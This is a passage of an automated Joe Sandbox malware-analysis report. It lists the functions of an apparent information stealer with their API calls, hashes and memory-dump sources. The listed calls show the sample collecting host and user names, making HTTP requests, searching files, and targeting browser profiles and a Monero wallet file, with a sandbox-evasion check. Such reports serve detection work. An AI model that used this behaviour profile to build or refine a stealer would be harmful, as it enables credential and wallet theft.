                          Similarity
                          • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                          • String ID:
                          • API String ID: 941982115-0
                          • Opcode ID: cff3c0624422e0c828212ff853bec0222643be9130b2354f78961ee07c3b8749
                          • Instruction ID: d75eb4653aa9644ed1ff582760f580b8f72ad07815b67461fbabed725ef43d0f
                          • Opcode Fuzzy Hash: cff3c0624422e0c828212ff853bec0222643be9130b2354f78961ee07c3b8749
                          • Instruction Fuzzy Hash: ABF05E70944609AFEF02ABA0DC0BBBE7B78FB14745F104514B503A51C1DBB05544E696
                          Function 003847B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00384839
                          • InternetCrackUrlA.WININET(00000000,00000000), ref: 00384849
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CrackInternetlstrlen
                          • String ID: <
                          • API String ID: 1274457161-4251816714
                          • Opcode ID: 1a373fd53b81dfc5763e71277d744e44319d2de9752b8d9ba00608c48be5b94e
                          • Instruction ID: b01511d1a0c7bfb3f345f29a308a30aa607632bf81a8a0c6d2c38ce42be0e2fc
                          • Opcode Fuzzy Hash: 1a373fd53b81dfc5763e71277d744e44319d2de9752b8d9ba00608c48be5b94e
                          • Instruction Fuzzy Hash: CF214FB1D00209ABDF14DFA4E845ADE7B75FB44320F108625F915AB2C1EB706A09CF81
                          Function 003951F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                            • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                            • Part of subcall function 00386280: InternetOpenA.WININET(003A0DFE,00000001,00000000,00000000,00000000), ref: 003862E1
                            • Part of subcall function 00386280: StrCmpCA.SHLWAPI(?,00E3EA88), ref: 00386303
                            • Part of subcall function 00386280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00386335
                            • Part of subcall function 00386280: HttpOpenRequestA.WININET(00000000,GET,?,00E3DFD8,00000000,00000000,00400100,00000000), ref: 00386385
                            • Part of subcall function 00386280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003863BF
                            • Part of subcall function 00386280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003863D1
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00395228
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                          • String ID: ERROR$ERROR
                          • API String ID: 3287882509-2579291623
                          • Opcode ID: a3e1f226786c0d4bc0337cb1837cb013e00d495bf40278b576f13dcf26b2c28d
                          • Instruction ID: 052276dff5a865f1fb954c1536b1e3adc98f4af3277d83199dd00dc6c13743d6
                          • Opcode Fuzzy Hash: a3e1f226786c0d4bc0337cb1837cb013e00d495bf40278b576f13dcf26b2c28d
                          • Instruction Fuzzy Hash: 42112E30910908ABDF16FFA0DD52AED7778AF50300F404668F80A4E592EF30AB06D7D1
                          Function 003978E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00397910
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00397917
                          • GetComputerNameA.KERNEL32(?,00000104), ref: 0039792F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateComputerNameProcess
                          • String ID:
                          • API String ID: 1664310425-0
                          • Opcode ID: b88e71bd35f9420ff54de30a18d923b90be08e06d5eb259c29cb01ec023c1b37
                          • Instruction ID: cac7a1c82624b38a6a81dfcb686bc9929629d5b56be2a2bbc03b2e0cf905f59d
                          • Opcode Fuzzy Hash: b88e71bd35f9420ff54de30a18d923b90be08e06d5eb259c29cb01ec023c1b37
                          • Instruction Fuzzy Hash: 6D0181B1A04608EFDB10DF98DD45FAABBBCFB04B25F10421AFA45E3680C37459048BA1
                          Function 00381110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0038112B
                          • VirtualAllocExNuma.KERNEL32(00000000), ref: 00381132
                          • ExitProcess.KERNEL32 ref: 00381143
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$AllocCurrentExitNumaVirtual
                          • String ID:
                          • API String ID: 1103761159-0
                          • Opcode ID: 48ba17fc91330bdd96ad2554df90a749fd9ff9b6a831b1a6685eb97311b15926
                          • Instruction ID: 49d6df66046bdaecfbbe25769b155e9e1caaf95d34808bc747af206903a0a5d2
                          • Opcode Fuzzy Hash: 48ba17fc91330bdd96ad2554df90a749fd9ff9b6a831b1a6685eb97311b15926
                          • Instruction Fuzzy Hash: C7E0E6B094534CFFE7106BA09C0EF097ABCEB14B05F204094F7097A1D0D6B52A45A799
                          Function 003810A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 003810B3
                          • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 003810F7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocFree
                          • String ID:
                          • API String ID: 2087232378-0
                          • Opcode ID: cd44674056fc2f07052030c4508d9d01ba6e53de6d019f04f94cea1702393ec4
                          • Instruction ID: 800b4a40c9547ab6f1e1073f157625b3221e36e6bfdd8a86ae83dda1e318d047
                          • Opcode Fuzzy Hash: cd44674056fc2f07052030c4508d9d01ba6e53de6d019f04f94cea1702393ec4
                          • Instruction Fuzzy Hash: D4F0E2B1641308BBEB14ABA4AC49FAAB7ECE705B15F300448F504E7280D5729E04DBA0
                          Function 00381190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 003978E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00397910
                            • Part of subcall function 003978E0: RtlAllocateHeap.NTDLL(00000000), ref: 00397917
                            • Part of subcall function 003978E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0039792F
                            • Part of subcall function 00397850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003811B7), ref: 00397880
                            • Part of subcall function 00397850: RtlAllocateHeap.NTDLL(00000000), ref: 00397887
                            • Part of subcall function 00397850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0039789F
                          • ExitProcess.KERNEL32 ref: 003811C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Process$AllocateName$ComputerExitUser
                          • String ID:
                          • API String ID: 3550813701-0
                          • Opcode ID: 6b55e9db2ca6386421c13d07d61fc5bab87c4f48a2e3e8f631e12406ec8e050c
                          • Instruction ID: efc716be42fc1c0b06f9ace52067a309b9967597a2243c0c3a881fe42a4a6437
                          • Opcode Fuzzy Hash: 6b55e9db2ca6386421c13d07d61fc5bab87c4f48a2e3e8f631e12406ec8e050c
                          • Instruction Fuzzy Hash: 49E012B592430557CE0173B0AC0FF2A379C9B6534DF040465FA05D6142FA25E805966A

                          Non-executed Functions

                          Function 003938B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 003938CC
                          • FindFirstFileA.KERNEL32(?,?), ref: 003938E3
                          • lstrcat.KERNEL32(?,?), ref: 00393935
                          • StrCmpCA.SHLWAPI(?,003A0F70), ref: 00393947
                          • StrCmpCA.SHLWAPI(?,003A0F74), ref: 0039395D
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00393C67
                          • FindClose.KERNEL32(000000FF), ref: 00393C7C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                          • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                          • API String ID: 1125553467-2524465048
                          • Opcode ID: 95438b918410391c9fea37fc71eca75ad884f2caf3625aa7025e69796e9bc87c
                          • Instruction ID: c3a8975c45701afbfdd6477c2a058f95b87eed1f78da8170ee7784bcb7b6a0c3
                          • Opcode Fuzzy Hash: 95438b918410391c9fea37fc71eca75ad884f2caf3625aa7025e69796e9bc87c
                          • Instruction Fuzzy Hash: E5A140B19006089FDF25DFA4DC85FEA7778FB59304F044588E60DA6141EB759B88CFA2
                          Function 00394910 Relevance: 38.7, APIs: 18, Strings: 4, Instructions: 172fileCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 0039492C
                          • FindFirstFileA.KERNEL32(?,?), ref: 00394943
                          • StrCmpCA.SHLWAPI(?,003A0FDC), ref: 00394971
                          • StrCmpCA.SHLWAPI(?,003A0FE0), ref: 00394987
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00394B7D
                          • FindClose.KERNEL32(000000FF), ref: 00394B92
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\%s$%s\%s$%s\*$h
                          • API String ID: 180737720-834126881
                          • Opcode ID: 2e81663ea0b5480c4543807f6ddef3af01c6070bf2b633eee2796d0d0ca5f5c1
                          • Instruction ID: 17ecaf162a809959499993bf59871151009994cc5e72bcec8d25752c86204a09
                          • Opcode Fuzzy Hash: 2e81663ea0b5480c4543807f6ddef3af01c6070bf2b633eee2796d0d0ca5f5c1
                          • Instruction Fuzzy Hash: 6F6164B2900618AFCF25EBA0DC49EEA77BCFB59704F044588F549A6040EB759B89CF91
                          Function 0038BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                            • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                            • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,00E39168,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                            • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                            • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                            • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                          • FindFirstFileA.KERNEL32(00000000,?,003A0B32,003A0B2B,00000000,?,?,?,003A13F4,003A0B2A), ref: 0038BEF5
                          • StrCmpCA.SHLWAPI(?,003A13F8), ref: 0038BF4D
                          • StrCmpCA.SHLWAPI(?,003A13FC), ref: 0038BF63
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0038C7BF
                          • FindClose.KERNEL32(000000FF), ref: 0038C7D1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                          • API String ID: 3334442632-726946144
                          • Opcode ID: e9bc892d8442f81ffbfcf2cce85dced2ab5c2a07976f6540101f54c1097526a1
                          • Instruction ID: acfa79fac32e22a3d3e9d850a189269070a2ba84c4ec9f30890168540800bc32
                          • Opcode Fuzzy Hash: e9bc892d8442f81ffbfcf2cce85dced2ab5c2a07976f6540101f54c1097526a1
                          • Instruction Fuzzy Hash: BA4255729106089BDF16FBB0DD96EED777DAB54300F404698F50A9A081EF349B49CBE2
                          Function 00394570 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 137stringmemoryfileCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00394580
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00394587
                          • wsprintfA.USER32 ref: 003945A6
                          • FindFirstFileA.KERNEL32(?,?), ref: 003945BD
                          • StrCmpCA.SHLWAPI(?,003A0FC4), ref: 003945EB
                          • StrCmpCA.SHLWAPI(?,003A0FC8), ref: 00394601
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0039468B
                          • FindClose.KERNEL32(000000FF), ref: 003946A0
                          • lstrcat.KERNEL32(?,00E3EA68), ref: 003946C5
                          • lstrcat.KERNEL32(?,00E3D6A0), ref: 003946D8
                          • lstrlen.KERNEL32(?), ref: 003946E5
                          • lstrlen.KERNEL32(?), ref: 003946F6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
